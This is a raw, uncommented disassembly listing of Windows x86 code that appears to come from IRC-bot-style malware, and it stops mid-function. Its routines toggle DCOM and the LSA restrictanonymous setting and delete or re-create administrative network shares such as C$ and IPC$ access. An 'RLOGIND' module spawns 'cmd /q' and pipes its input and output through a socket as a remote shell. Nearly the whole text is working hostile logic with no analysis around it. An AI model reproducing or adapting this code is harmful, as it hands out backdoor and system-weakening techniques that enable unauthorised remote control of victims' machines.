var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 214h
push esi
push edi
xor edi, edi
cmp dword_433600, edi
jnz loc_40EAF8
lea eax, [ebp+var_4]
push eax
push 2001Fh
push edi
push offset aSoftwareMicros ; "Software\\Microsoft\\OLE"
mov esi, 80000002h
push esi
call dword_4335C8
test eax, eax
jnz short loc_40EA51
lea eax, [ebp+var_8+2]
mov word ptr [ebp+var_8+2], 4Eh
lea edx, [eax+1]
loc_40EA09: ; CODE XREF: sub_40E9C5+49�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40EA09
sub eax, edx
push eax
lea eax, [ebp+var_8+2]
push eax
push 1
push edi
push offset aEnabledcom ; "EnableDCOM"
push [ebp+var_4]
call dword_433484
test eax, eax
lea eax, [ebp+var_214]
jz short loc_40EA39
push offset aSecureDisableD ; "[SECURE]: Disable DCOM failed."
jmp short loc_40EA3E
; ---------------------------------------------------------------------------
loc_40EA39: ; CODE XREF: sub_40E9C5+6B�j
push offset aSecureDcomDisa ; "[SECURE]: DCOM disabled."
loc_40EA3E: ; CODE XREF: sub_40E9C5+72�j
push eax
call sub_412BB5
pop ecx
pop ecx
push [ebp+var_4]
call dword_43357C
jmp short loc_40EA64
; ---------------------------------------------------------------------------
loc_40EA51: ; CODE XREF: sub_40E9C5+36�j
lea eax, [ebp+var_214]
push offset aSecureFailed_0 ; "[SECURE]: Failed to open DCOM registry "...
push eax
call sub_412BB5
pop ecx
pop ecx
loc_40EA64: ; CODE XREF: sub_40E9C5+8A�j
cmp [ebp+arg_C], edi
jnz short loc_40EA83
push 1
push [ebp+arg_8]
lea eax, [ebp+var_214]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 14h
loc_40EA83: ; CODE XREF: sub_40E9C5+A2�j
lea eax, [ebp+var_214]
push eax
call sub_401C33
pop ecx
lea eax, [ebp+var_4]
push eax
push 0F003Fh
push edi
push offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Control\\Lsa"
push esi
call dword_4335C8
test eax, eax
jnz short loc_40EAF1
push 4
lea eax, [ebp+var_8]
push eax
push 4
push edi
push offset aRestrictanonym ; "restrictanonymous"
push [ebp+var_4]
mov [ebp+var_8], 1
call dword_433484
test eax, eax
lea eax, [ebp+var_214]
jz short loc_40EAD9
push offset aSecureFailed_1 ; "[SECURE]: Failed to restrict access to "...
jmp short loc_40EADE
; ---------------------------------------------------------------------------
loc_40EAD9: ; CODE XREF: sub_40E9C5+10B�j
push offset aSecureRestrict ; "[SECURE]: Restricted access to the IPC$"...
loc_40EADE: ; CODE XREF: sub_40E9C5+112�j
push eax
call sub_412BB5
pop ecx
pop ecx
push [ebp+var_4]
call dword_43357C
jmp short loc_40EB0B
; ---------------------------------------------------------------------------
loc_40EAF1: ; CODE XREF: sub_40E9C5+E3�j
push offset aSecureFailed_2 ; "[SECURE]: Failed to open IPC$ Restricti"...
jmp short loc_40EAFD
; ---------------------------------------------------------------------------
loc_40EAF8: ; CODE XREF: sub_40E9C5+13�j
push offset aSecureAdvapi32 ; "[SECURE]: Advapi32.dll couldn't be load"...
loc_40EAFD: ; CODE XREF: sub_40E9C5+131�j
lea eax, [ebp+var_214]
push eax
call sub_412BB5
pop ecx
pop ecx
loc_40EB0B: ; CODE XREF: sub_40E9C5+12A�j
cmp [ebp+arg_C], edi
jnz short loc_40EB2A
push 1
push [ebp+arg_8]
lea eax, [ebp+var_214]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 14h
loc_40EB2A: ; CODE XREF: sub_40E9C5+149�j
lea eax, [ebp+var_214]
push eax
call sub_401C33
cmp dword_433628, edi
pop ecx
jnz loc_40ECA7
mov [ebp+var_4], edi
mov [ebp+var_14], edi
mov [ebp+var_C], edi
push ebx
loc_40EB4D: ; CODE XREF: sub_40E9C5+2C6�j
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_4]
push eax
push 0FFFFFFFFh
lea eax, [ebp+var_8]
push eax
push 1F6h
push edi
call dword_4335A0
cmp eax, edi
mov [ebp+var_10], eax
jz short loc_40EBEC
cmp eax, 0EAh
jz short loc_40EBEC
xor esi, esi
loc_40EB7B: ; CODE XREF: sub_40E9C5+220�j
push off_42B2F0[esi]
push edi
call sub_406032
pop ecx
pop ecx
push off_42B2F0[esi]
test eax, eax
lea eax, [ebp+var_214]
jnz short loc_40EBA0
push offset aSecureShareSDe ; "[SECURE]: Share '%s' deleted."
jmp short loc_40EBA5
; ---------------------------------------------------------------------------
loc_40EBA0: ; CODE XREF: sub_40E9C5+1D2�j
push offset aSecureFailed_3 ; "[SECURE]: Failed to delete '%s' share."
loc_40EBA5: ; CODE XREF: sub_40E9C5+1D9�j
push 200h
push eax
call sub_412E0D
add esp, 10h
cmp [ebp+arg_C], edi
jnz short loc_40EBD2
push 1
push [ebp+arg_8]
lea eax, [ebp+var_214]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 14h
loc_40EBD2: ; CODE XREF: sub_40E9C5+1F1�j
lea eax, [ebp+var_214]
push eax
call sub_401C33
add esi, 8
cmp esi, 20h
pop ecx
jb short loc_40EB7B
jmp loc_40EC84
; ---------------------------------------------------------------------------
loc_40EBEC: ; CODE XREF: sub_40E9C5+1AB�j
; sub_40E9C5+1B2�j
mov esi, [ebp+var_8]
xor ebx, ebx
inc ebx
cmp [ebp+var_4], ebx
jb loc_40EC7B
loc_40EBFB: ; CODE XREF: sub_40E9C5+2B2�j
mov edi, [esi]
push edi
call sub_413FEE
cmp word ptr [edi+eax*2-2], 24h
pop ecx
jnz short loc_40EC70
push edi
call sub_405F46
push eax
push 0
call sub_406032
add esp, 0Ch
push dword ptr [esi]
test eax, eax
lea eax, [ebp+var_214]
jnz short loc_40EC30
push offset aSecureShareS_0 ; "[SECURE]: Share '%S' deleted."
jmp short loc_40EC35
; ---------------------------------------------------------------------------
loc_40EC30: ; CODE XREF: sub_40E9C5+262�j
push offset aSecureFailed_4 ; "[SECURE]: Failed to delete '%S' share."
loc_40EC35: ; CODE XREF: sub_40E9C5+269�j
push 200h
push eax
call sub_412E0D
add esp, 10h
cmp [ebp+arg_C], 0
jnz short loc_40EC63
push 1
push [ebp+arg_8]
lea eax, [ebp+var_214]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 14h
loc_40EC63: ; CODE XREF: sub_40E9C5+282�j
lea eax, [ebp+var_214]
push eax
call sub_401C33
pop ecx
loc_40EC70: ; CODE XREF: sub_40E9C5+245�j
add esi, 28h
inc ebx
cmp ebx, [ebp+var_4]
jbe short loc_40EBFB
xor edi, edi
loc_40EC7B: ; CODE XREF: sub_40E9C5+230�j
push [ebp+var_8]
call dword_4334D8
loc_40EC84: ; CODE XREF: sub_40E9C5+222�j
cmp [ebp+var_10], 0EAh
jz loc_40EB4D
lea eax, [ebp+var_214]
push offset aSecureNetworkS ; "[SECURE]: Network shares deleted."
push eax
call sub_412BB5
pop ecx
pop ecx
pop ebx
jmp short loc_40ECBA
; ---------------------------------------------------------------------------
loc_40ECA7: ; CODE XREF: sub_40E9C5+178�j
lea eax, [ebp+var_214]
push offset aSecureNetapi32 ; "[SECURE]: Netapi32.dll couldn't be load"...
push eax
call sub_412BB5
pop ecx
pop ecx
loc_40ECBA: ; CODE XREF: sub_40E9C5+2E0�j
cmp [ebp+arg_C], edi
jnz short loc_40ECD8
push edi
push [ebp+arg_8]
lea eax, [ebp+var_214]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 14h
loc_40ECD8: ; CODE XREF: sub_40E9C5+2F8�j
lea eax, [ebp+var_214]
push eax
call sub_401C33
pop ecx
xor eax, eax
pop edi
inc eax
pop esi
leave
retn
sub_40E9C5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40ECEC proc near ; CODE XREF: sub_40F023:loc_40F061�p
var_220 = byte ptr -220h
var_20 = byte ptr -20h
var_14 = byte ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 220h
push ebx
xor ebx, ebx
cmp dword_433600, ebx
push esi
jnz loc_40EE1B
lea eax, [ebp+var_4]
push eax
push 2001Fh
push ebx
push offset aSoftwareMicros ; "Software\\Microsoft\\OLE"
mov esi, 80000002h
push esi
call dword_4335C8
test eax, eax
jnz short loc_40ED78
lea eax, [ebp+var_8+2]
mov word ptr [ebp+var_8+2], 59h
lea edx, [eax+1]
loc_40ED30: ; CODE XREF: sub_40ECEC+49�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40ED30
sub eax, edx
push eax
lea eax, [ebp+var_8+2]
push eax
push 1
push ebx
push offset aEnabledcom ; "EnableDCOM"
push [ebp+var_4]
call dword_433484
test eax, eax
lea eax, [ebp+var_220]
jz short loc_40ED60
push offset aSecureEnableDc ; "[SECURE]: Enable DCOM failed."
jmp short loc_40ED65
; ---------------------------------------------------------------------------
loc_40ED60: ; CODE XREF: sub_40ECEC+6B�j
push offset aSecureDcomEnab ; "[SECURE]: DCOM enabled."
loc_40ED65: ; CODE XREF: sub_40ECEC+72�j
push eax
call sub_412BB5
pop ecx
pop ecx
push [ebp+var_4]
call dword_43357C
jmp short loc_40ED8B
; ---------------------------------------------------------------------------
loc_40ED78: ; CODE XREF: sub_40ECEC+36�j
lea eax, [ebp+var_220]
push offset aSecureFailed_0 ; "[SECURE]: Failed to open DCOM registry "...
push eax
call sub_412BB5
pop ecx
pop ecx
loc_40ED8B: ; CODE XREF: sub_40ECEC+8A�j
cmp [ebp+arg_C], ebx
jnz short loc_40EDAA
push 1
push [ebp+arg_8]
lea eax, [ebp+var_220]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 14h
loc_40EDAA: ; CODE XREF: sub_40ECEC+A2�j
lea eax, [ebp+var_220]
push eax
call sub_401C33
pop ecx
lea eax, [ebp+var_4]
push eax
push 0F003Fh
push ebx
push offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Control\\Lsa"
push esi
call dword_4335C8
test eax, eax
jnz short loc_40EE14
push 4
lea eax, [ebp+var_8]
push eax
push 4
push ebx
push offset aRestrictanonym ; "restrictanonymous"
push [ebp+var_4]
mov [ebp+var_8], ebx
call dword_433484
test eax, eax
lea eax, [ebp+var_220]
jz short loc_40EDFC
push offset aSecureFailed_5 ; "[SECURE]: Failed to unrestrict access t"...
jmp short loc_40EE01
; ---------------------------------------------------------------------------
loc_40EDFC: ; CODE XREF: sub_40ECEC+107�j
push offset aSecureUnrestri ; "[SECURE]: Unrestricted access to the IP"...
loc_40EE01: ; CODE XREF: sub_40ECEC+10E�j
push eax
call sub_412BB5
pop ecx
pop ecx
push [ebp+var_4]
call dword_43357C
jmp short loc_40EE2E
; ---------------------------------------------------------------------------
loc_40EE14: ; CODE XREF: sub_40ECEC+E3�j
push offset aSecureFailed_6 ; "[SECURE]: Failed to open IPC$ restricti"...
jmp short loc_40EE20
; ---------------------------------------------------------------------------
loc_40EE1B: ; CODE XREF: sub_40ECEC+13�j
push offset aSecureAdvapi32 ; "[SECURE]: Advapi32.dll couldn't be load"...
loc_40EE20: ; CODE XREF: sub_40ECEC+12D�j
lea eax, [ebp+var_220]
push eax
call sub_412BB5
pop ecx
pop ecx
loc_40EE2E: ; CODE XREF: sub_40ECEC+126�j
cmp [ebp+arg_C], ebx
jnz short loc_40EE4D
push 1
push [ebp+arg_8]
lea eax, [ebp+var_220]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 14h
loc_40EE4D: ; CODE XREF: sub_40ECEC+145�j
lea eax, [ebp+var_220]
push eax
call sub_401C33
cmp dword_433628, ebx
pop ecx
jnz loc_40EFC0
push edi
xor esi, esi
mov edi, 200h
loc_40EE6E: ; CODE XREF: sub_40ECEC+1EF�j
push dword_42B2F4[esi]
push off_42B2F0[esi]
push ebx
call sub_405FC7
add esp, 0Ch
push off_42B2F0[esi]
test eax, eax
lea eax, [ebp+var_220]
jnz short loc_40EE9A
push offset aSecureShareSAd ; "[SECURE]: Share '%s' added."
jmp short loc_40EE9F
; ---------------------------------------------------------------------------
loc_40EE9A: ; CODE XREF: sub_40ECEC+1A5�j
push offset aSecureFailed_7 ; "[SECURE]: Failed to add '%s' share."
loc_40EE9F: ; CODE XREF: sub_40ECEC+1AC�j
push edi
push eax
call sub_412E0D
add esp, 10h
cmp [ebp+arg_C], ebx
jnz short loc_40EEC8
push 1
push [ebp+arg_8]
lea eax, [ebp+var_220]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 14h
loc_40EEC8: ; CODE XREF: sub_40ECEC+1C0�j
lea eax, [ebp+var_220]
push eax
call sub_401C33
add esi, 8
cmp esi, 10h
pop ecx
jb short loc_40EE6E
call ds:dword_41F0FC
test eax, eax
mov [ebp+var_4], eax
mov bl, 41h
jz loc_40EFA8
loc_40EEF0: ; CODE XREF: sub_40ECEC+2B6�j
test byte ptr [ebp+var_4], 1
jz loc_40EF9D
cmp bl, 41h
jz loc_40EF9D
movsx esi, bl
push esi
push offset aC_1 ; "%c$"
lea eax, [ebp+var_14]
push 0Ah
push eax
call sub_412E0D
push esi
push offset aC_0 ; "%c:\\"
lea eax, [ebp+var_20]
push 0Ah
push eax
call sub_412E0D
add esp, 20h
lea eax, [ebp+var_20]
push eax
call dword_43342C
cmp eax, 3
jnz short loc_40EF9D
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_14]
push eax
push 0
call sub_405FC7
add esp, 0Ch
test eax, eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_220]
jnz short loc_40EF61
push offset aSecureShareSAd ; "[SECURE]: Share '%s' added."
jmp short loc_40EF66
; ---------------------------------------------------------------------------
loc_40EF61: ; CODE XREF: sub_40ECEC+26C�j
push offset aSecureFailed_7 ; "[SECURE]: Failed to add '%s' share."
loc_40EF66: ; CODE XREF: sub_40ECEC+273�j
push edi
push eax
call sub_412E0D
add esp, 10h
cmp [ebp+arg_C], 0
jnz short loc_40EF90
push 1
push [ebp+arg_8]
lea eax, [ebp+var_220]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 14h
loc_40EF90: ; CODE XREF: sub_40ECEC+288�j
lea eax, [ebp+var_220]
push eax
call sub_401C33
pop ecx
loc_40EF9D: ; CODE XREF: sub_40ECEC+208�j
; sub_40ECEC+211�j ...
inc bl
shr [ebp+var_4], 1
jnz loc_40EEF0
loc_40EFA8: ; CODE XREF: sub_40ECEC+1FE�j
lea eax, [ebp+var_220]
push offset aSecureNetwor_0 ; "[SECURE]: Network shares added."
push eax
call sub_412BB5
pop ecx
pop ecx
xor ebx, ebx
pop edi
jmp short loc_40EFD3
; ---------------------------------------------------------------------------
loc_40EFC0: ; CODE XREF: sub_40ECEC+174�j
lea eax, [ebp+var_220]
push offset aSecureNetapi32 ; "[SECURE]: Netapi32.dll couldn't be load"...
push eax
call sub_412BB5
pop ecx
pop ecx
loc_40EFD3: ; CODE XREF: sub_40ECEC+2D2�j
cmp [ebp+arg_C], ebx
jnz short loc_40EFF1
push ebx
push [ebp+arg_8]
lea eax, [ebp+var_220]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 14h
loc_40EFF1: ; CODE XREF: sub_40ECEC+2EA�j
lea eax, [ebp+var_220]
push eax
call sub_401C33
pop ecx
xor eax, eax
pop esi
inc eax
pop ebx
leave
retn
sub_40ECEC endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_40F005 proc near ; CODE XREF: sub_40F005+1C�j
; DATA XREF: sub_40D1EF+3B4�o
push 1
push 0
push 0
push 0
call sub_40E9C5
add esp, 10h
push dword_42B2EC
call ds:dword_41F000
jmp short sub_40F005
sub_40F005 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_40F023 proc near ; DATA XREF: sub_4078FA+4A4B�o
var_98 = dword ptr -98h
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 98h
mov eax, [ebp+74h+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+74h+var_98]
rep movsd
cmp [ebp+74h+var_10], 0
push [ebp+74h+var_8]
mov dword ptr [eax+94h], 1
push [ebp+74h+var_C]
lea eax, [ebp+74h+var_94]
push eax
push [ebp+74h+var_98]
jz short loc_40F061
call sub_40E9C5
jmp short loc_40F066
; ---------------------------------------------------------------------------
loc_40F061: ; CODE XREF: sub_40F023+35�j
call sub_40ECEC
loc_40F066: ; CODE XREF: sub_40F023+3C�j
add esp, 10h
push [ebp+74h+var_14]
call sub_4111AE
pop ecx
push 0
call ds:dword_41F014
int 3 ; Trap to Debugger
sub_40F023 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F07B proc near ; CODE XREF: sub_40F2F9+98�p
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 58h
push esi
push edi
push 11h
xor eax, eax
pop ecx
lea edi, [ebp+var_58]
rep stosd
lea edi, [ebp+var_14]
stosd
xor esi, esi
stosd
stosd
stosd
mov eax, [ebp+arg_0]
mov edi, ds:dword_41F0B4
push esi
push 1
mov [ebp+var_20], eax
push 2
lea eax, [ebp+var_18]
push eax
mov [ebp+var_4], esi
mov [ebp+var_58], 44h
mov [ebp+var_54], esi
mov [ebp+var_4C], esi
mov [ebp+var_50], esi
mov [ebp+var_3C], esi
mov [ebp+var_40], esi
mov [ebp+var_44], esi
mov [ebp+var_48], esi
mov [ebp+var_28], si
mov [ebp+var_24], esi
mov [ebp+var_26], si
mov [ebp+var_2C], 101h
mov [ebp+var_1C], ebx
call edi
push eax
push ebx
call edi
push eax
call ds:dword_41F0E8
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_58]
push eax
push esi
push esi
push esi
push 1
push esi
push esi
push offset aCmdQ ; "cmd /q"
push esi
call ds:dword_41F030
test eax, eax
jz short loc_40F12B
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_C]
imul eax, 234h
push [ebp+var_10]
mov esi, [ebp+var_14]
mov dword_434340[eax], ecx
call ds:dword_41F034
jmp short loc_40F141
; ---------------------------------------------------------------------------
loc_40F12B: ; CODE XREF: sub_40F07B+8E�j
call ds:dword_41F008
push eax
push offset aRlogindFaile_2 ; "[RLOGIND]: Failed to execute shell, err"...
call sub_401CA7
mov esi, [ebp+var_4]
pop ecx
pop ecx
loc_40F141: ; CODE XREF: sub_40F07B+AE�j
pop edi
mov eax, esi
pop esi
leave
retn
sub_40F07B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_40F147 proc near ; DATA XREF: sub_40F3F5+3F�o
var_1B0 = byte ptr -1B0h
var_C8 = byte ptr -0C8h
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 1B0h
push ebx
mov ebx, ds:dword_41F058
push esi
push edi
mov edi, [ebp+74h+arg_0]
jmp short loc_40F1A9
; ---------------------------------------------------------------------------
loc_40F160: ; CODE XREF: sub_40F147+77�j
xor eax, eax
xor dl, dl
xor esi, esi
cmp [ebp+74h+arg_0], eax
jbe short loc_40F192
loc_40F16B: ; CODE XREF: sub_40F147+49�j
mov cl, [ebp+esi+74h+var_C8]
cmp cl, 0Ah
jnz short loc_40F182
cmp dl, 0Dh
jz short loc_40F182
mov [ebp+eax+74h+var_1B0], 0Dh
inc eax
loc_40F182: ; CODE XREF: sub_40F147+2B�j
; sub_40F147+30�j
mov [ebp+eax+74h+var_1B0], cl
inc eax
inc esi
cmp esi, [ebp+74h+arg_0]
mov dl, cl
jb short loc_40F16B
loc_40F192: ; CODE XREF: sub_40F147+22�j
push 0
push eax
lea eax, [ebp+74h+var_1B0]
push eax
push dword ptr [edi+0Ch]
call dword_433534
test eax, eax
jle short loc_40F1C0
loc_40F1A9: ; CODE XREF: sub_40F147+17�j
push 0
lea eax, [ebp+74h+arg_0]
push eax
push 0C8h
lea eax, [ebp+74h+var_C8]
push eax
push dword ptr [edi]
call ebx
test eax, eax
jnz short loc_40F160
loc_40F1C0: ; CODE XREF: sub_40F147+60�j
mov esi, ds:dword_41F008
call esi
cmp eax, 6Dh
jz short loc_40F1DC
call esi
push eax
push offset aRlogindSession ; "[RLOGIND]: SessionReadShellThread exite"...
call sub_401CA7
pop ecx
pop ecx
loc_40F1DC: ; CODE XREF: sub_40F147+84�j
pop edi
pop esi
pop ebx
add ebp, 74h
leave
retn
sub_40F147 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_40F1E4 proc near ; DATA XREF: sub_40F3F5+75�o
var_DC = byte ptr -0DCh
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 0DCh
push ebx
push esi
xor ebx, ebx
push edi
mov edi, [ebp+74h+arg_0]
xor esi, esi
mov [ebp+74h+var_10], ebx
jmp loc_40F2D6
; ---------------------------------------------------------------------------
loc_40F201: ; CODE XREF: sub_40F1E4+107�j
cmp [ebp+74h+var_10], ebx
jbe short loc_40F20E
dec [ebp+74h+var_10]
jmp loc_40F2D9
; ---------------------------------------------------------------------------
loc_40F20E: ; CODE XREF: sub_40F1E4+20�j
mov al, byte ptr [ebp+74h+arg_0+3]
movsx ecx, al
cmp ecx, 0FFh
jz loc_40F2C1
cmp al, 8
mov [ebp+74h+var_C], ebx
jz short loc_40F278
cmp al, 7Fh
jz short loc_40F278
cmp al, 3
jnz short loc_40F239
push ebx
push ebx
call ds:dword_41F100
jmp short loc_40F29F
; ---------------------------------------------------------------------------
loc_40F239: ; CODE XREF: sub_40F1E4+49�j
cmp al, 15h
jnz short loc_40F25B
xor esi, esi
mov [ebp+74h+var_8], 20h
mov [ebp+74h+var_7], 58h
mov [ebp+74h+var_6], 58h
mov [ebp+74h+var_5], 58h
mov [ebp+74h+var_4], 0Dh
mov [ebp+74h+var_3], 0Ah
push 6
jmp short loc_40F28B
; ---------------------------------------------------------------------------
loc_40F25B: ; CODE XREF: sub_40F1E4+57�j
xor ecx, ecx
mov [ebp+esi+74h+var_DC], al
inc esi
inc ecx
cmp al, 0Dh
mov [ebp+74h+var_8], al
jnz short loc_40F28C
mov [ebp+esi+74h+var_DC], 0Ah
mov [ebp+74h+var_7], 0Ah
inc esi
push 2
jmp short loc_40F28B
; ---------------------------------------------------------------------------
loc_40F278: ; CODE XREF: sub_40F1E4+41�j
; sub_40F1E4+45�j
cmp esi, ebx
jbe short loc_40F2A2
dec esi
mov [ebp+74h+var_8], 8
mov [ebp+74h+var_7], 20h
mov [ebp+74h+var_6], 8
push 3
loc_40F28B: ; CODE XREF: sub_40F1E4+75�j
; sub_40F1E4+92�j
pop ecx
loc_40F28C: ; CODE XREF: sub_40F1E4+84�j
push ebx
push ecx
lea eax, [ebp+74h+var_8]
push eax
push dword ptr [edi+0Ch]
call dword_433534
test eax, eax
jle short loc_40F2F1
loc_40F29F: ; CODE XREF: sub_40F1E4+53�j
mov al, byte ptr [ebp+74h+arg_0+3]
loc_40F2A2: ; CODE XREF: sub_40F1E4+96�j
cmp al, 0Dh
jnz short loc_40F2D9
push ebx
lea eax, [ebp+74h+var_14]
push eax
push esi
lea eax, [ebp+74h+var_DC]
push eax
push dword ptr [edi+4]
call ds:dword_41F038
test eax, eax
jz short loc_40F2F1
xor esi, esi
jmp short loc_40F2D9
; ---------------------------------------------------------------------------
loc_40F2C1: ; CODE XREF: sub_40F1E4+36�j
cmp [ebp+74h+var_C], ebx
jnz short loc_40F2CF
mov [ebp+74h+var_C], 1
jmp short loc_40F2D9
; ---------------------------------------------------------------------------
loc_40F2CF: ; CODE XREF: sub_40F1E4+E0�j
mov [ebp+74h+var_10], 0Ah
loc_40F2D6: ; CODE XREF: sub_40F1E4+18�j
mov [ebp+74h+var_C], ebx
loc_40F2D9: ; CODE XREF: sub_40F1E4+25�j
; sub_40F1E4+C0�j ...
push ebx
push 1
lea eax, [ebp+74h+arg_0+3]
push eax
push dword ptr [edi+0Ch]
call dword_433414
test eax, eax
jg loc_40F201
loc_40F2F1: ; CODE XREF: sub_40F1E4+B9�j
; sub_40F1E4+D7�j
pop edi
pop esi
pop ebx
add ebp, 74h
leave
retn
sub_40F1E4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F2F9 proc near ; CODE XREF: sub_40F3F5+D�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push esi
push edi
xor edi, edi
push 18h
mov [ebp+var_4], edi
mov [ebp+var_8], edi
call sub_41344D
mov esi, eax
cmp esi, edi
pop ecx
jnz short loc_40F31E
xor eax, eax
jmp loc_40F3F1
; ---------------------------------------------------------------------------
loc_40F31E: ; CODE XREF: sub_40F2F9+1C�j
push ebx
push edi
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_8]
mov [esi], edi
push eax
lea ebx, [esi+4]
mov [ebx], edi
push esi
mov [ebp+var_14], 0Ch
mov [ebp+var_10], edi
mov [ebp+var_C], 1
call ds:dword_41F0EC
test eax, eax
mov edi, ds:dword_41F034
jnz short loc_40F35F
call ds:dword_41F008
push eax
push offset aRlogindFaile_3 ; "[RLOGIND]: Failed to create shell stdou"...
jmp short loc_40F380
; ---------------------------------------------------------------------------
loc_40F35F: ; CODE XREF: sub_40F2F9+56�j
push 0
lea eax, [ebp+var_14]
push eax
push ebx
lea eax, [ebp+var_4]
push eax
call ds:dword_41F0EC
test eax, eax
jnz short loc_40F388
call ds:dword_41F008
push eax
push offset aRlogindFaile_4 ; "[RLOGIND]: Failed to create shell stdin"...
loc_40F380: ; CODE XREF: sub_40F2F9+64�j
call sub_401CA7
pop ecx
jmp short loc_40F3B5
; ---------------------------------------------------------------------------
loc_40F388: ; CODE XREF: sub_40F2F9+79�j
push [ebp+arg_0]
mov ebx, [ebp+var_8]
push [ebp+var_4]
call sub_40F07B
pop ecx
pop ecx
mov [esi+8], eax
push [ebp+var_4]
call edi
push [ebp+var_8]
call edi
cmp dword ptr [esi+8], 0
jnz short loc_40F3EA
push offset aRlogindFaile_5 ; "[RLOGIND]: Failed to execute shell."
call sub_401C33
loc_40F3B5: ; CODE XREF: sub_40F2F9+8D�j
cmp [ebp+var_4], 0
pop ecx
jz short loc_40F3C1
push [ebp+var_4]
call edi
loc_40F3C1: ; CODE XREF: sub_40F2F9+C1�j
cmp [ebp+var_8], 0
jz short loc_40F3CC
push [ebp+var_8]
call edi
loc_40F3CC: ; CODE XREF: sub_40F2F9+CC�j
mov eax, [esi]
test eax, eax
jz short loc_40F3D5
push eax
call edi
loc_40F3D5: ; CODE XREF: sub_40F2F9+D7�j
mov eax, [esi+4]
test eax, eax
jz short loc_40F3DF
push eax
call edi
loc_40F3DF: ; CODE XREF: sub_40F2F9+E1�j
push esi
call sub_412FE4
pop ecx
xor eax, eax
jmp short loc_40F3F0
; ---------------------------------------------------------------------------
loc_40F3EA: ; CODE XREF: sub_40F2F9+B0�j
or dword ptr [esi+0Ch], 0FFFFFFFFh
mov eax, esi
loc_40F3F0: ; CODE XREF: sub_40F2F9+EF�j
pop ebx
loc_40F3F1: ; CODE XREF: sub_40F2F9+20�j
pop edi
pop esi
leave
retn
sub_40F2F9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F3F5 proc near ; CODE XREF: sub_40E00D+1BC�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
push edi
call sub_40F2F9
imul edi, 234h
mov esi, eax
mov eax, dword_434344[edi]
mov edi, ds:dword_41F00C
xor ebx, ebx
pop ecx
mov [ebp+var_C], 0Ch
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
mov [esi+0Ch], eax
lea eax, [ebp+arg_0]
push eax
push ebx
push esi
push offset sub_40F147
push ebx
lea eax, [ebp+var_C]
push eax
call edi
cmp eax, ebx
mov [esi+10h], eax
jnz short loc_40F464
call ds:dword_41F008
push eax
